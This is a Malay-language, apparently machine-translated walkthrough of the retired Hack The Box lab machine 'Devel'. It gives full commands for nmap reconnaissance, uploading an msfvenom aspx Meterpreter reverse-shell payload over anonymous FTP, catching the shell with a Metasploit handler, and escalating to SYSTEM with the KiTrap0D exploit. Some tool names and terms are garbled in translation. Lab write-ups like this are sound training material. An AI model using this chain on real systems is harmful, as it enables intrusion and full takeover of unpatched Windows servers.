Tetap Tenang dan Hack Kotak - Devel

Hack The Box (HTB) adalah platform dalam talian yang membolehkan anda menguji kemahiran ujian penembusan anda. Ia mengandungi beberapa cabaran yang sentiasa dikemas kini. Sebilangan dari mereka mensimulasikan senario dunia nyata dan ada yang lebih cenderung kepada gaya cabaran CTF.

Catatan . Hanya pendaftaran mesin HTB yang sudah bersara yang dibenarkan.

Devel digambarkan sebagai kotak yang agak sederhana yang menunjukkan risiko keselamatan yang berkaitan dengan beberapa konfigurasi program lalai. Ini adalah mesin peringkat pemula yang dapat disiapkan menggunakan eksploitasi yang tersedia untuk umum.

Kami akan menggunakan alat berikut untuk menggadaikan kotak pada kotak Kali Linux

  • nmap
  • peta zen
  • searchsploit
  • metasploit
  • msfvenom

Langkah 1 - Mengimbas rangkaian

Langkah pertama sebelum memanfaatkan mesin adalah melakukan sedikit pengimbasan dan pengintaian.

Ini adalah salah satu bahagian yang paling penting kerana ia akan menentukan apa yang anda boleh cuba gunakan selepas itu. Lebih baik meluangkan lebih banyak masa pada fasa itu untuk mendapatkan sebanyak mungkin maklumat.

Saya akan menggunakan Nmap (Network Mapper), yang merupakan utiliti sumber terbuka dan bebas untuk penemuan rangkaian dan pengauditan keselamatan. Ia menggunakan paket IP mentah untuk menentukan host apa yang tersedia di rangkaian, perkhidmatan apa yang ditawarkan oleh host tersebut, sistem operasi apa yang mereka jalankan, jenis filter paket / firewall apa yang digunakan, dan puluhan ciri lain.

Terdapat banyak perintah yang dapat anda gunakan dengan alat ini untuk mengimbas rangkaian. Sekiranya anda ingin mengetahui lebih lanjut mengenainya, anda boleh melihat dokumentasinya di sini.

Saya menggunakan arahan berikut untuk mendapatkan idea asas tentang apa yang kita imbas

nmap -sV -O -F --version-light 10.10.10.5

-sV: Probe terbuka port untuk menentukan maklumat perkhidmatan / versi

-O: Dayakan pengesanan OS

-F: Mod pantas - Imbas lebih sedikit port daripada imbasan lalai

- cahaya penukaran: Hadkan pada probe yang paling mungkin (intensiti 2)

10.10.10. 5 : Alamat IP kotak Devel

Anda juga boleh menggunakan Zenmap , yang merupakan GUI Pengawal Keselamatan Nmap rasmi. Ini adalah aplikasi sumber pelbagai terbuka, percuma dan terbuka yang bertujuan untuk menjadikan Nmap mudah digunakan oleh pemula sambil menyediakan ciri-ciri canggih untuk pengguna Nmap yang berpengalaman.

Saya menggunakan sekumpulan perintah yang berbeza untuk melakukan imbasan intensif

nmap -A -v 10.10.10.5

-A: Aktifkan pengesanan OS, pengesanan versi, pengimbasan skrip, dan traceroute

-v: Meningkatkan tahap verbositi

10.10.10.5: Alamat IP kotak Devel

Sekiranya hasilnya terlalu banyak, anda boleh beralih ke tab Pelabuhan / Host untuk mendapatkan port terbuka sahaja.

Kita dapat melihat bahawa terdapat 2 port terbuka:

Pelabuhan 21 . Kawalan (arahan) Protokol Pemindahan Fail (FTP). Inilah FTP Microsoft

Pelabuhan 80 . Protokol Pemindahan Hiperteks (HTTP). Inilah pelayan IIS

Vektor serangan awal yang paling mungkin kelihatan adalah FTP dalam kes ini

Langkah 2 - FTP yang terdedah

Kami membuka Firefox dan melayari laman web di //10.10.10.5

Dari fasa pengintaian, kami menemui 2 fail di bawah Microsoft FTP. Mari lihat sama ada kita boleh mengaksesnya dari penyemak imbas.

Saya boleh mengakses fail gambar welcome.png dengan melayari

//10.10.10.5/welcome.png

Saya juga boleh melayari laman iisstart.htm

//10.10.10.5/iisstart.htm

Kami kini mengetahui dua perkara:

  • FTP digunakan sebagai direktori file untuk pelayan web - ditemukan ketika kami mengakses file dari tahap pengintaian.
  • FTP membenarkan log masuk tanpa nama - ditemui semasa kami melakukan imbasan yang mendalam.

Mari kita lihat sama ada kita dapat membuat fail dan menambahkannya ke FTP

Saya membuat fail dengan menggunakan perintah ini dan mengeluarkan hasilnya ke fail bernama htb.html

echo HackTheBox > htb.html

Saya kemudian semak dengan ls jika fail yang telah dicipta dan apa yang kandungan fail dengan arahan ini

cat htb.html

Sekarang mari kita sambung ke FTP untuk menambahkan fail ujian kami

Untuk menyambung ke FTP, saya menggunakan arahan ini

ftp 10.10.10.5

Saya menaip tanpa nama sebagai nama pengguna dan tekan enter untuk kata laluan, kerana ia membenarkan log masuk tanpa nama.

Saya kini berhubung dengan FTP.

Saya menambah fail pada FTP dengan arahan ini

put htb.html

Fail berjaya dihantar. Mari periksa sama ada kita boleh mengaksesnya dari Firefox. Saya mengunjungi halaman tersebut dan kita dapat melihat output HackTheBox di laman web.

//10.10.10.5/htb.html

Sekarang kita tahu bahawa kita boleh menghantar fail, mari buat eksploitasi!

Langkah 3 - Menggunakan MSFvenom untuk membuat eksploitasi

Kami akan menggunakan MSFvenom, yang merupakan penjana muatan. Anda boleh mengetahui lebih lanjut mengenainya di sini

Tetapi pertama-tama, mari kita periksa Metasploit Framework mana muatan yang kita perlukan untuk membuat eksploitasi kita.

Kita tahu bahawa kita perlu membuat shell terbalik , yang merupakan jenis shell di mana mesin sasaran berkomunikasi kembali ke mesin penyerang. Mesin penyerang mempunyai port pendengar di mana ia menerima sambungan, yang dengan menggunakan, pelaksanaan kod atau perintah dicapai.

Shell TCP terbalik seharusnya untuk Windows dan kami akan menggunakan Meterpreter .

Dari laman web Keselamatan Serangan, kami mendapat definisi ini untuk Meterpreter

Meterpreter adalah muatan maju dan dinamik yang dapat diperluas yang menggunakan stager suntikan DLL dalam memori dan diperluas melalui rangkaian pada waktu runtime. Ini berkomunikasi melalui soket stager dan menyediakan API Ruby sisi pelanggan yang komprehensif. Ia mempunyai sejarah perintah, penyelesaian tab, saluran, dan banyak lagi.

Anda boleh membaca lebih lanjut mengenai Meterpreter di sini.

Saya melancarkan Metasploit dan mencari muatan TCP terbalik. Saya menggunakan arahan berikut

search windows/meterpreter/reverse_tcp

Kami menjumpai muatan yang menarik, nombor 2, yang merupakan Reverse TCP Stager .Muatan ini menyuntikkan DLL pelayan meteran melalui muatan Reflektif Dll Injection dan menghubungkan kembali ke penyerang

payload/windows/meterpreter/reverse_tcp

Sekarang mari kita kembali ke msfvenom untuk membuat eksploitasi kita. Dan lebih khusus lagi cengkerang terbalik aspx . Maklumat ini telah dikumpulkan semasa fasa recon

Saya menggunakan arahan berikut

msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx LHOST=10.10.14.15 LPORT=4444

- p : Muatan untuk digunakan

- f : Format output

- 0 : Simpan muatan ke fail

LHOST : Tuan rumah tempatan

LPORT : Pelabuhan tempatan

Saya kemudian semak dengan ls jika fail yang telah dicipta. Sudah tiba masanya untuk menghantarnya ke FTP

Mari sambung semula ke FTP dan hantar hadiah kecil kami!

Saya menyambung ke FTP, masukkan tanpa nama sebagai nama pengguna, langkau kata laluan dengan menekan enter. Saya kemudian menghantar fail dengan arahan berikut

put devel.aspx

Mari periksa sama ada fail telah dihantar dengan betul. Kembali ke Firefox , saya menavigasi ke pelayan FTP dengan arahan berikut

ftp://10.10.10.5

Kami dapat melihat bahawa hadiah kecil kami ada di sini!

Inilah eksploitinya, jika anda ingin tahu bagaimana rupanya

Langkah 4 - Menyiapkan pendengar dengan Metasploit

Kembali ke Metasploit di mana saya menggunakan arahan berikut untuk menetapkan pengendali muatan

use exploit/multi/handler

Saya periksa untuk melihat pilihan mana yang ada

Kami mula-mula menetapkan muatan

set payload windows/meterpreter/reverse_tcp

Kemudian yang TERHAD

set lhost 10.10.14.15

Dan akhirnya LPORT

set lport 4444

Sekiranya kita memeriksa pilihannya sekarang, kita harus melihat bahawa semuanya sudah disiapkan

Mari jalankan eksploitasi.

Selepas mesej ini muncul

Started reverse TCP handler on 10.10.14.15:4444

kembali ke penyemak imbas dan akses halaman di mana skrip jahat dihoskan

//10.10.10.5/devel.aspx

Anda harus melihat sesi Meterpreter dibuat

Sekarang saya mempunyai sesi, saya cuba mencari bendera pertama, user.txt menggunakan arahan berikut pada meterpreter

search -f user.txt

Tiada fail yang sepadan dengan carian saya. Saya cuba dengan. * Untuk melihat fail lain, tetapi tidak ada yang berguna

Saya kemudian membuat shell dengan arahan berikut

shell

Saya menggunakan arahan berikut untuk mendapatkan maklumat sistem

systeminfo

Kita dapat melihat bahawa pemilik berdaftar dipanggil babis . Ini mungkin merupakan maklumat penting ketika kita akan mencari bendera pengguna. Kami juga dapat melihat bahawa mesin tersebut tidak mempunyai perbaikan terbaru.

Saya mula menavigasi folder. Saya menggunakan dir untuk menyenaraikan semua fail / folder dan cd untuk menukar direktori. Saya mencuba nasib di folder babis dan Pentadbir , tetapi kedua-duanya memberi saya akses ditolak.

Kita perlu meningkatkan hak istimewa! Mengetahui bahawa ketika kami memeriksa maklumat sistem, tidak ada perbaikan terbaru yang dijumpai, kami dapat mencuba mencari eksploitasi yang berlaku untuk mesin ini.

Langkah 5 - Melakukan Peningkatan Keistimewaan

Saya meletakkan sesi di latar dengan arahan ini

background

Saya kemudian menggunakan arahan berikut

use post/multi/recon/local_exploit_suggester

Modul ini menunjukkan eksploitasi Meterpreter tempatan yang boleh digunakan. Eksploitasi disarankan berdasarkan arsitektur dan platform yang dibuka oleh pengguna dan juga eksploitasi yang tersedia di Meterpreter

Saya menyemak pilihan dan saya menetapkan sesi

Penting untuk diperhatikan bahawa tidak semua eksploitasi tempatan akan dipecat. Eksploitasi dipilih berdasarkan syarat-syarat ini: jenis sesi, platform, seni bina, dan pilihan lalai yang diperlukan

Turun senarai

exploit/windows/local/bypassuac_eventvwr

gagal kerana pengguna IIS tidak menjadi sebahagian daripada kumpulan pentadbir, yang merupakan lalai dan diharapkan.

Saya menggunakan eksploitasi seterusnya dalam senarai, iaitu

use exploit/windows/local/ms10_015_kitrap0d

Modul ini akan membuat sesi baru dengan keistimewaan SYSTEM melalui eksploitasi KiTrap0D oleh Tavis Ormandy. Sekiranya sesi yang digunakan sudah dinaikkan maka eksploitasi tidak akan berjalan. Modul bergantung pada kitrap0d.x86.dll, dan tidak disokong pada edisi x64 Windows.

Ketika kami menjalankan sysinfo dalam sesi Meterpreter, itu menunjukkan bahawa sasarannya adalah seni bina x86

Saya menyemak pilihan dan kemudian menetapkan sesi

Saya menjalankan eksploitasi.

Eksploitasi berjaya, tetapi sesi tidak dapat dibuat. Ini kerana baris pertama dalam eksploitasi berusaha untuk mengatur pengendali terbalik pada port et0 dan lalai lalai, dan bukan antara muka VPN untuk makmal HTB.

Started reverse TCP handler on 10.0.2.15:4444

Saya menyemak pilihan dan menetapkan LHOST dan LPORT

Saya kemudian memeriksa semua sesi hidup dengan arahan berikut, sekiranya sesi saya mati

sessions -l

Saya dapat melihat sesi saya

Sekarang kita mempunyai sesi meter meter, mari mulakan navigasi folder dan cari bendera!

Langkah 6 - Mencari bendera user.txt

Mari kita periksa di mana kita berada dengan arahan berikut

pwd

yang bermaksud direktori kerja cetak

Saya pergi ke C: \ dan ls semua fail / folder. Saya sudah tahu dari mana mencarinya dari percubaan saya sebelumnya dalam Langkah 4 - Menyiapkan pendengar dengan Metasploit

Saya kembali ke direktori Pengguna

Kemudian pindah ke direktori babis

Dari sana, saya pergi ke direktori Desktop

Kami menjumpai fail user.txt.txt ! Untuk membaca kandungan fail saya menggunakan arahan

cat user.txt.txt

Sekarang kita mempunyai bendera pengguna, mari cari bendera akar!

Langkah 7 - Mencari bendera root.txt

Kembali ke C: \ untuk menavigasi ke folder Pentadbir kemudian folder Desktop . Saya menggunakan ls untuk menyenaraikan semua fail di bawah folder Desktop

Kami menemui fail root.txt.txt !

Untuk membaca kandungan fail saya menggunakan arahan

cat root.txt.txt

Tahniah! Anda menemui kedua-dua bendera!

Jangan ragu untuk memberi komen, bertanya atau berkongsi dengan rakan anda :)

Anda boleh melihat lebih banyak artikel saya di sini

Anda boleh mengikuti saya di Twitter atau di LinkedIn

Dan jangan lupa untuk # GetSecure , # BeSecure & # StaySecure !

Artikel Hack The Box yang lain

  • Tetap Tenang dan Hack Kotak - Lumpuh
  • Tetap Tenang dan Hack Kotak - Warisan
  • Tetap Tenang dan Hack Kotak - Bunyi